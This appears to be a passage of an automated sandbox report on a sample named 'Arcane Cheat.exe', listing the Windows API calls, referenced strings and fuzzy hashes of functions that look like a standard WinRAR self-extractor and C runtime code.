                                  • Instruction Fuzzy Hash: F251D270A0020D9FCB10CFA8DC85AEEBBF9FF08300F24415AE555E7291EB70AA45CB61
                                  APIs
                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0083C54A
                                  • _swprintf.LIBCMT ref: 0083C57E
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • SetDlgItemTextW.USER32(?,00000066,0086946A), ref: 0083C59E
                                  • _wcschr.LIBVCRUNTIME ref: 0083C5D1
                                  • EndDialog.USER32(?,00000001), ref: 0083C6B2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                  • String ID: %s%s%u
                                  • API String ID: 2892007947-1360425832
                                  • Opcode ID: b00f9ca9c77b365294bbd5d1ea2dac7abc9b7b118ee34dd0b5ec11210978cd48
                                  • Instruction ID: f9c12338883c5a7c07907e92179d559c5f50a654e043398a76ce7622a6ff057a
                                  • Opcode Fuzzy Hash: b00f9ca9c77b365294bbd5d1ea2dac7abc9b7b118ee34dd0b5ec11210978cd48
                                  • Instruction Fuzzy Hash: 0941E4B190062CAADF26DBA4DC45EDA77BCFF48305F0050A6E509E60A1EB759BC4CF91
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00838F38
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00838F59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AllocByteCharGlobalMultiWide
                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                  • API String ID: 3286310052-4209811716
                                  • Opcode ID: 2a1be605665987b5b58230922c0c0da4d892384d8f605ff971fe71ba1d7d8911
                                  • Instruction ID: 6f8a7e0c4ba2635bd06128d7804c3b486ca30f0c2dfcd6ba8108935e75850956
                                  • Opcode Fuzzy Hash: 2a1be605665987b5b58230922c0c0da4d892384d8f605ff971fe71ba1d7d8911
                                  • Instruction Fuzzy Hash: B6312332548315BBD721AB289C06FAF77A8FF91761F100119F811E62C1EF689A4983E6
                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 0083964E
                                  • GetWindowRect.USER32(?,00000000), ref: 00839693
                                  • ShowWindow.USER32(?,00000005,00000000), ref: 0083972A
                                  • SetWindowTextW.USER32(?,00000000), ref: 00839732
                                  • ShowWindow.USER32(00000000,00000005), ref: 00839748
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Window$Show$RectText
                                  • String ID: RarHtmlClassName
                                  • API String ID: 3937224194-1658105358
                                  • Opcode ID: 01c6ab4a5619f04548289570d8678c7b512643fb8ddefcf1096ea3d0f3dc88d4
                                  • Instruction ID: 340703e0bb8e0384b4aebd609afa2ec540a47120d0a77cc3771450eb45897459
                                  • Opcode Fuzzy Hash: 01c6ab4a5619f04548289570d8678c7b512643fb8ddefcf1096ea3d0f3dc88d4
                                  • Instruction Fuzzy Hash: CB31CF35004204EFCB119F68DC8DB6B7BA8FF88711F114559FE89DA1A2DB74E944CBA1
                                  APIs
                                    • Part of subcall function 0084BF79: _free.LIBCMT ref: 0084BFA2
                                  • _free.LIBCMT ref: 0084C003
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 0084C00E
                                  • _free.LIBCMT ref: 0084C019
                                  • _free.LIBCMT ref: 0084C06D
                                  • _free.LIBCMT ref: 0084C078
                                  • _free.LIBCMT ref: 0084C083
                                  • _free.LIBCMT ref: 0084C08E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                  • Instruction ID: a94657bdfc74e0fbe340b1ea7ac80dbae15c342b0b4b8c1610cb5d8caca9bd79
                                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                  • Instruction Fuzzy Hash: FD11EA71940B0CFAD620BBB4CC06FCBB79DFF14700F408855B29DE6852DF65E9088A92
                                  APIs
                                  • GetLastError.KERNEL32(?,?,008420C1,0083FB12), ref: 008420D8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008420E6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008420FF
                                  • SetLastError.KERNEL32(00000000,?,008420C1,0083FB12), ref: 00842151
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                  • API String ID: 0-1718035505
                                  APIs
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830D0D
                                    • Part of subcall function 0082ACF5: GetVersionExW.KERNEL32(?), ref: 0082AD1A
                                  • LocalFileTimeToFileTime.KERNEL32(?,00830CB8), ref: 00830D31
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00830D47
                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00830D56
                                  • SystemTimeToFileTime.KERNEL32(?,00830CB8), ref: 00830D64
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830D72
                                  Similarity
                                  • API ID: Time$File$System$Local$SpecificVersion
                                  • String ID:
                                  • API String ID: 2092733347-0
                                  APIs
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID:
                                  • API String ID: 2931989736-0
                                  APIs
                                  • GetLastError.KERNEL32(?,00860EE8,00843E14,00860EE8,?,?,00843713,00000050,?,00860EE8,00000200), ref: 00848FA9
                                  • _free.LIBCMT ref: 00848FDC
                                  • _free.LIBCMT ref: 00849004
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 00849011
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 0084901D
                                  • _abort.LIBCMT ref: 00849023
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0083D2F2
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083D30C
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083D31D
                                  • TranslateMessage.USER32(?), ref: 0083D327
                                  • DispatchMessageW.USER32(?), ref: 0083D331
                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0083D33C
                                  Similarity
                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 2148572870-0
                                  APIs
                                  • _wcschr.LIBVCRUNTIME ref: 0083C435
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  Strings
                                  Similarity
                                  • API ID: CompareString_wcschr
                                  • String ID: <$HIDE$MAX$MIN
                                  • API String ID: 2548945186-3358265660
                                  APIs
                                  • LoadBitmapW.USER32(00000065), ref: 0083ADFD
                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0083AE22
                                  • DeleteObject.GDI32(00000000), ref: 0083AE54
                                  • DeleteObject.GDI32(00000000), ref: 0083AE77
                                    • Part of subcall function 00839E1C: FindResourceW.KERNEL32(0083AE4D,PNG,?,?,?,0083AE4D,00000066), ref: 00839E2E
                                    • Part of subcall function 00839E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0083AE4D,00000066), ref: 00839E46
                                    • Part of subcall function 00839E1C: LoadResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E59
                                    • Part of subcall function 00839E1C: LockResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E64
                                  Strings
                                  Similarity
                                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                  • String ID: ]
                                  • API String ID: 142272564-3352871620
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083CCDB
                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0083CCF1
                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0083CD05
                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0083CD14
                                  Strings
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: RENAMEDLG
                                  • API String ID: 445417207-3299779563
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00847573,00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002), ref: 008475E2
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008475F5
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00847573,00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002), ref: 00847618
                                  Strings
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  APIs
                                    • Part of subcall function 00830085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
                                    • Part of subcall function 00830085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0082EB92
                                  • GetProcAddress.KERNEL32(008681C0,CryptUnprotectMemory), ref: 0082EBA2
                                  Strings
                                  Similarity
                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                  • API String ID: 2141747552-1753850145
                                  APIs
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 0084B619
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0084B63C
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0084B662
                                  • _free.LIBCMT ref: 0084B675
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0084B684
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                  • String ID:
                                  • API String ID: 336800556-0
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,0084895F,008485FB,?,00848FD3,00000001,00000364,?,00843713,00000050,?,00860EE8,00000200), ref: 0084902E
                                  • _free.LIBCMT ref: 00849063
                                  • _free.LIBCMT ref: 0084908A
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 00849097
                                  • SetLastError.KERNEL32(00000000,?,00860EE8,00000200), ref: 008490A0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  APIs
                                    • Part of subcall function 00830A41: ResetEvent.KERNEL32(?), ref: 00830A53
                                    • Part of subcall function 00830A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00830A67
                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0083078F
                                  • CloseHandle.KERNEL32(?,?), ref: 008307A9
                                  • DeleteCriticalSection.KERNEL32(?), ref: 008307C2
                                  • CloseHandle.KERNEL32(?), ref: 008307CE
                                  • CloseHandle.KERNEL32(?), ref: 008307DA
                                    • Part of subcall function 0083084E: WaitForSingleObject.KERNEL32(?,000000FF,00830A78,?), ref: 00830854
                                    • Part of subcall function 0083084E: GetLastError.KERNEL32(?), ref: 00830860
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                  • String ID:
                                  APIs
                                  • _free.LIBCMT ref: 0084BF28
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 0084BF3A
                                  • _free.LIBCMT ref: 0084BF4C
                                  • _free.LIBCMT ref: 0084BF5E
                                  • _free.LIBCMT ref: 0084BF70
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  APIs
                                  • _free.LIBCMT ref: 0084807E
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 00848090
                                  • _free.LIBCMT ref: 008480A3
                                  • _free.LIBCMT ref: 008480B4
                                  • _free.LIBCMT ref: 008480C5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe,00000104), ref: 008476FD
                                  • _free.LIBCMT ref: 008477C8
                                  • _free.LIBCMT ref: 008477D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00827579
                                    • Part of subcall function 00823B3D: __EH_prolog.LIBCMT ref: 00823B42
                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00827640
                                    • Part of subcall function 00827BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00827C04
                                    • Part of subcall function 00827BF5: GetLastError.KERNEL32 ref: 00827C4A
                                    • Part of subcall function 00827BF5: CloseHandle.KERNEL32(?), ref: 00827C59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083A4B8
                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0083A4CD
                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0083A4E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: ASKNEXTVOL
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: __fprintf_l_strncpy
                                  • String ID: $%s$@%s
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083A9DE
                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0083A9F6
                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0083AA24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: GETPASSWORD1
                                  APIs
                                  • _swprintf.LIBCMT ref: 0082B51E
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • _wcschr.LIBVCRUNTIME ref: 0082B53C
                                  • _wcschr.LIBVCRUNTIME ref: 0082B54C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                  • String ID: %c:\
                                  APIs
                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0082ABC5,00000008,?,00000000,?,0082CB88,?,00000000), ref: 008306F3
                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0082ABC5,00000008,?,00000000,?,0082CB88,?,00000000), ref: 008306FD
                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0082ABC5,00000008,?,00000000,?,0082CB88,?,00000000), ref: 0083070D
                                  Strings
                                  • Thread pool initialization failed., xrefs: 00830725
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                  • String ID: Thread pool initialization failed.
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID:
                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008280B7,?,?,?), ref: 0082A351
                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008280B7,?,?), ref: 0082A395
                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008280B7,?,?,?,?,?,?,?,?), ref: 0082A416
                                  • CloseHandle.KERNEL32(?,?,00000000,?,008280B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0082A41D
                                  Similarity
                                  • API ID: File$Create$CloseHandleTime
                                  • String ID:
                                  • API String ID: 2287278272-0
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008489AD,?,00000000,?,00000001,?,?,00000001,008489AD,?), ref: 0084C0E6
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0084C16F
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008467E2,?), ref: 0084C181
                                  • __freea.LIBCMT ref: 0084C18A
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                  • String ID:
                                  • API String ID: 2652629310-0
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0084251A
                                    • Part of subcall function 00842B52: ___AdjustPointer.LIBCMT ref: 00842B9C
                                  • _UnwindNestedFrames.LIBCMT ref: 00842531
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00842543
                                  • CallCatchBlock.LIBVCRUNTIME ref: 00842567
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  APIs
                                  • GetDC.USER32(00000000), ref: 00839DBE
                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00839DCD
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00839DDB
                                  • ReleaseDC.USER32(00000000,00000000), ref: 00839DE9
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00842016
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0084201B
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00842020
                                    • Part of subcall function 0084310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0084311F
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00842035
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • String ID:
                                  • API String ID: 1761009282-0
                                  APIs
                                    • Part of subcall function 00839DF1: GetDC.USER32(00000000), ref: 00839DF5
                                    • Part of subcall function 00839DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00839E00
                                    • Part of subcall function 00839DF1: ReleaseDC.USER32(00000000,00000000), ref: 00839E0B
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00839F8D
                                    • Part of subcall function 0083A1E5: GetDC.USER32(00000000), ref: 0083A1EE
                                    • Part of subcall function 0083A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0083A21D
                                    • Part of subcall function 0083A1E5: ReleaseDC.USER32(00000000,?), ref: 0083A2B5
                                  Strings
                                  Similarity
                                  • API ID: ObjectRelease$CapsDevice
                                  • String ID: (
                                  • API String ID: 1061551593-3887548279
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: _swprintf
                                  • String ID: %ls$%s: %s
                                  • API String ID: 589789837-2259941744
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00827730
                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008278CC
                                    • Part of subcall function 0082A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A458
                                    • Part of subcall function 0082A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A489
                                  Strings
                                  Similarity
                                  • API ID: File$Attributes$H_prologTime
                                  • String ID: :
                                  • API String ID: 1861295151-336475711
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: UNC$\\?\
                                  • API String ID: 0-253988292
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: Shell.Explorer$about:blank
                                  • API String ID: 0-874089819
                                  APIs
                                    • Part of subcall function 0082EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0082EB92
                                    • Part of subcall function 0082EB73: GetProcAddress.KERNEL32(008681C0,CryptUnprotectMemory), ref: 0082EBA2
                                  • GetCurrentProcessId.KERNEL32(?,?,?,0082EBEC), ref: 0082EC84
                                  Strings
                                  • CryptProtectMemory failed, xrefs: 0082EC3B
                                  • CryptUnprotectMemory failed, xrefs: 0082EC7C
                                  Similarity
                                  • API ID: AddressProc$CurrentProcess
                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                  • API String ID: 2190909847-396321323
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00010000,008309D0,?,00000000,00000000), ref: 008308AD
                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 008308F4
                                    • Part of subcall function 00826E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00826EAF
                                  Strings
                                  Similarity
                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                  • String ID: CreateThread failed
                                  • API String ID: 2655393344-3849766595
                                  APIs
